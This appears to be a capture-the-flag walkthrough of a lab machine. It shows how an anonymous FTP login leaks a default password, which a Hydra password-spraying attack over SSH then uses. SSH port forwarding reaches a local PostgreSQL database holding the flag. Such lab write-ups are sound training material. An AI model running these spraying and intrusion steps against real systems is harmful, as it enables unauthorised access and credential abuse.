Port scan (exchange ip with your machines IP address):
sudo nmap -sV ip
Relevant output:
PORT STATE SERVICE VERSION 21/tcp open ftp vsftpd 3.0.3 22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0) Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Let's try to login via FTP with the default credentials (Username: anonymous, hit enter for password).
ftp ip hit enter
Success! Let's see what we got:
dir
Output:
229 Entering Extended Passive Mode (|||27324|) 150 Here comes the directory listing. drwxr-xr-x 2 ftp ftp 4096 Nov 28 2022 mail_backup 226 Directory send OK.
Lets check what's inside of the mail_backup directory
cd mail_backup ls
Output:
229 Entering Extended Passive Mode (|||18542|) 150 Here comes the directory listing. -rw-r--r-- 1 ftp ftp 58899 Nov 28 2022 password_policy.pdf -rw-r--r-- 1 ftp ftp 713 Nov 28 2022 welcome_28112022 226 Directory send OK.
Let's download these two files and close the FTP connection:
get password_policy.pdf get welcome_28112022 exit
First we view the contents of the welcome file:
cat welcome_28112022
Relevant output (email addresses):
Frome: root@funnel.htb To: optimus@funnel.htb albert@funnel.htb andreas@funnel.htb christine@funnel.htb maria@funnel.htb
Now, the password file. Since using cat for PDF files is not a working solution, we open the directory and open the file by double clicking on it!
open .
Relevant file information:
For example the default password of “funnel123#!#” must be changed immediately.
Since we got a couple of email addresses and a default password now, we can check if someone did not change it. The server also has port 22 (SSH) open, so we will try the usernames with the password funnel123#!# in a password spraying attack with the tool Hydra.
Let's create a list of usernames first:
cd temp sudo nano usernames.txt
Paste the usernames, each in a new line. Then hit ctrl + o and enter so save, and then ctrl + x to close the text editor. Check if your file outputs this:
cat usernames.txt root optimus albert andreas christine maria
Then, use Hydra to try all username/password combinations via SSH:
hydra -L usernames.txt -p 'funnel123#!#' ip ssh
Relevant output:
[22][ssh] host: 10.129.228.195 login: christine password: funnel123#!#
We got a working username for the default password! Let's SSH into the machine with these credentials.
ssh christine@ip type: yes password: funnel123#!#
Yeah, we got in! Let's see some more info about this account:
id
Relevant output:
uid=1000(christine) gid=1000(christine) groups=1000(christine)
Let's explore this server. With the "ss" command (socket statistics) we can see which ports are open locally. Flag -l (listening sockets) and Flag -t (TCP sockets) are appended.
ss -tl
Output:
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 4096 127.0.0.1:34313 0.0.0.0:* LISTEN 0 4096 127.0.0.53%lo:domain 0.0.0.0:* LISTEN 0 128 0.0.0.0:ssh 0.0.0.0:* LISTEN 0 4096 127.0.0.1:postgresql 0.0.0.0:* LISTEN 0 32 *:ftp *:* LISTEN 0 128 [::]:ssh [::]:*
The port of our interest is the port of the PostgreSQL database. We can append the flag -n to our command to see the port number:
ss -tln
Output:
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process LISTEN 0 4096 127.0.0.1:34313 0.0.0.0:* LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* LISTEN 0 128 0.0.0.0:22 0.0.0.0:* LISTEN 0 4096 127.0.0.1:5432 0.0.0.0:* LISTEN 0 32 *:21 *:* LISTEN 0 128 [::]:22 [::]:*
The port of the PostgreSQL database is 5432. With the command line tool psql, we can interact with it. But running the command:
psql
Outputs:
Command 'psql' not found, but can be installed with: apt install postgresql-client-common Please ask your administrator.
Since we don't have admin privileges on this server, we will instead try to bypass this issue by local port-forwarding/tunneling via SSH. Close the SSH connection and reconnect with:
exit ssh -L 1234:localhost:5432 christine@ip password: funnel123#!#
We are logged in, as we were before. But when running :
ss -tlpn
We can see in the output, that we have now opened up a socket on our local machine on port 1234, to which we can direct traffic, that we want to be forwarded to port 5432 on the server.
LISTEN 0 128 127.0.0.1:1234 0.0.0.0:* users:(("ssh",pid=1855,fd=5))
LISTEN 0 128 [::1]:1234 [::]:* users:(("ssh",pid=1855,fd=4))
Now on our local machine, we can run this command to interact with the PostgreSQL service on the target machine.
psql -U christine -h localhost -p 1234 password: funnel123#!#
And it worked!
psql (15.3 (Debian 15.3-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1))
Let's see the database content:
\l
Outputs:
Name | Owner | Encoding | Collate | Ctype | ICU Locale | Locale Provider | Access privileges -----------+-----------+----------+------------+------------+------------+-----------------+------------------------- christine | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | postgres | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | secrets | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | template0 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine + | | | | | | | christine=CTc/christine template1 | christine | UTF8 | en_US.utf8 | en_US.utf8 | | libc | =c/christine + | | | | | | | christine=CTc/christine (5 rows)
What's inside secrets?
\q // close the overview \c secrets
Output:
psql (15.3 (Debian 15.3-0+deb12u1), server 15.1 (Debian 15.1-1.pgdg110+1)) You are now connected to database "secrets" as user "christine".
Let's view the tables:
\dt List of relations Schema | Name | Type | Owner --------+------+-------+----------- public | flag | table | christine (1 row)
Let's view the content of flag:
SELECT * FROM flag;
Congrats!